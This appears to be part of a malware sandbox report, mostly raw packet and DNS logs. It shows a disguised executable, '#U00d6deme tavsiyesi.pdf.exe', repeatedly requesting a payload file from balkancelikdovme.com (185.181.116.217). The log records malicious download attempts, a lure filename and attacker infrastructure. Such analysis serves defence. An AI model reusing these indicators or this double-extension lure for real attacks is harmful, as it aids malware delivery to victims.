      Dec 16, 2024 14:26:48.512613058 CET44350050185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:48.512659073 CET50050443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:48.513233900 CET50050443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:48.513797045 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:48.513842106 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:48.513957977 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:48.514158010 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:48.514174938 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:49.869491100 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:49.871186018 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:49.871212959 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:50.378428936 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:50.378495932 CET44350051185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:50.378556013 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:50.379076004 CET50051443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:50.379632950 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:50.379729986 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:50.379827023 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:50.380068064 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:50.380091906 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:51.736974955 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:51.738583088 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:51.738650084 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:52.239041090 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:52.239207983 CET44350052185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:52.239284039 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:52.239870071 CET50052443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:52.240366936 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:52.240423918 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:52.240550995 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:52.240782976 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:52.240801096 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:53.592936993 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:53.594995975 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:53.595062971 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:54.095974922 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:54.096144915 CET44350053185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:54.096215963 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:54.096654892 CET50053443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:54.097340107 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:54.097434044 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:54.097527981 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:54.097877026 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:54.097908974 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.448395967 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.450483084 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.450521946 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.954251051 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.954421043 CET44350054185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.954495907 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.954811096 CET50054443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.955310106 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.955353022 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:55.955447912 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.955641031 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:55.955646038 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.316979885 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.318746090 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.318819046 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.818811893 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.818989038 CET44350055185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.819082022 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.819585085 CET50055443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.820154905 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.820202112 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:57.820292950 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.820521116 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:57.820533991 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.207628012 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.209633112 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.209664106 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.709321022 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.709477901 CET44350056185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.709553957 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.710056067 CET50056443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.710654974 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.710714102 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:26:59.710803032 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.711030960 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:26:59.711050987 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.060242891 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.062460899 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.062508106 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.562796116 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.562884092 CET44350057185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.563056946 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.563589096 CET50057443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.564301968 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.564348936 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:01.564433098 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.564728975 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:01.564742088 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:02.916562080 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:02.918515921 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:02.918530941 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:03.423922062 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:03.424084902 CET44350058185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:03.424221039 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:03.425565958 CET50058443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:03.427098989 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:03.427201033 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:03.427395105 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:03.427711010 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:03.427747011 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:04.781044960 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:04.783433914 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:04.783523083 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:05.283519030 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:05.283874989 CET44350059185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:05.283970118 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:05.284457922 CET50059443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:05.285630941 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:05.285671949 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:05.285762072 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:05.286073923 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:05.286087036 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:06.650171995 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:06.652369976 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:06.652394056 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:07.152411938 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:07.152482033 CET44350060185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:07.152540922 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:07.153155088 CET50060443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:07.153676033 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:07.153731108 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:07.153827906 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:07.175095081 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:07.175122023 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:08.530677080 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:08.532545090 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:08.532613993 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:09.033689022 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:09.033761024 CET44350061185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:09.033864975 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:09.034475088 CET50061443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:09.035090923 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:09.035129070 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:09.035232067 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:09.035437107 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:09.035445929 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.389966011 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.394629955 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.394648075 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.891678095 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.891853094 CET44350062185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.891928911 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.892431021 CET50062443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.893146038 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.893246889 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:10.893351078 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.893625021 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:10.893661022 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.245419025 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.247975111 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.248008966 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.747793913 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.748019934 CET44350063185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.748159885 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.748665094 CET50063443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.749532938 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.749619007 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:12.749722004 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.749955893 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:12.749985933 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.102794886 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.105070114 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.105165005 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.606857061 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.607017040 CET44350064185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.607095003 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.607485056 CET50064443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.608082056 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.608119965 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:14.609415054 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.609672070 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:14.609687090 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:15.967503071 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:15.969858885 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:15.969872952 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:17.077533007 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:17.077721119 CET44350065185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:17.077774048 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:17.078191996 CET50065443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:17.079092026 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:17.079195023 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:17.079298019 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:17.079574108 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:17.079607010 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.457998037 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.470011950 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.470074892 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.959178925 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.959239006 CET44350066185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.959304094 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.959781885 CET50066443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.960314989 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.960352898 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:18.960426092 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.960747004 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:18.960772991 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.327128887 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.329988003 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.330008984 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.828927994 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.829014063 CET44350067185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.829128981 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.829741955 CET50067443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.830187082 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.830280066 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:20.832530975 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.832772017 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:20.832812071 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.233135939 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.235047102 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.235110998 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.736007929 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.736150026 CET44350068185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.736254930 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.736778021 CET50068443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.737351894 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.737397909 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:22.737545013 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.737715006 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:22.737725019 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.092701912 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.094788074 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.094810009 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.594271898 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.594403028 CET44350069185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.594597101 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.595065117 CET50069443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.595787048 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.595891953 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:24.595997095 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.596307993 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:24.596338987 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:25.958682060 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:25.961121082 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:25.961154938 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:26.461782932 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:26.461966991 CET44350070185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:26.462299109 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:26.462722063 CET50070443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:26.464649916 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:26.464701891 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:26.465079069 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:26.465079069 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:26.465117931 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:27.822813034 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:27.824963093 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:27.824976921 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:28.327105999 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:28.327191114 CET44350071185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:28.327433109 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:28.328121901 CET50071443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:28.329062939 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:28.329121113 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:28.329320908 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:28.329539061 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:28.329560041 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:29.682970047 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:29.701312065 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:29.701350927 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:30.186058044 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:30.186225891 CET44350072185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:30.186299086 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:30.196366072 CET50072443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:30.204830885 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:30.204869032 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:30.204946995 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:30.208353996 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:30.208370924 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:31.563643932 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:31.565363884 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:31.565390110 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:32.066257000 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:32.066417933 CET44350073185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:32.066493988 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:32.066874027 CET50073443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:32.067425013 CET50074443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:32.067473888 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:32.067650080 CET50074443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:32.067806005 CET50074443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:32.067821026 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:33.433415890 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:33.435369968 CET50074443192.168.2.5185.181.116.217
      Dec 16, 2024 14:27:33.435396910 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:33.935271978 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:33.935403109 CET44350074185.181.116.217192.168.2.5
      Dec 16, 2024 14:27:33.935642004 CET50074443192.168.2.5185.181.116.217
      TimestampSource PortDest PortSource IPDest IP
      Dec 16, 2024 14:24:25.892700911 CET5757553192.168.2.51.1.1.1
      Dec 16, 2024 14:24:26.108613014 CET53575751.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 16, 2024 14:24:25.892700911 CET192.168.2.51.1.1.10x88e4Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 16, 2024 14:24:26.108613014 CET1.1.1.1192.168.2.50x88e4No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
      • balkancelikdovme.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.549704185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:28 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:24:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:28 GMT
      vary: User-Agent
      2024-12-16 13:24:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.549705185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:30 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:30 GMT
      vary: User-Agent
      2024-12-16 13:24:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.549706185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:32 GMT
      vary: User-Agent
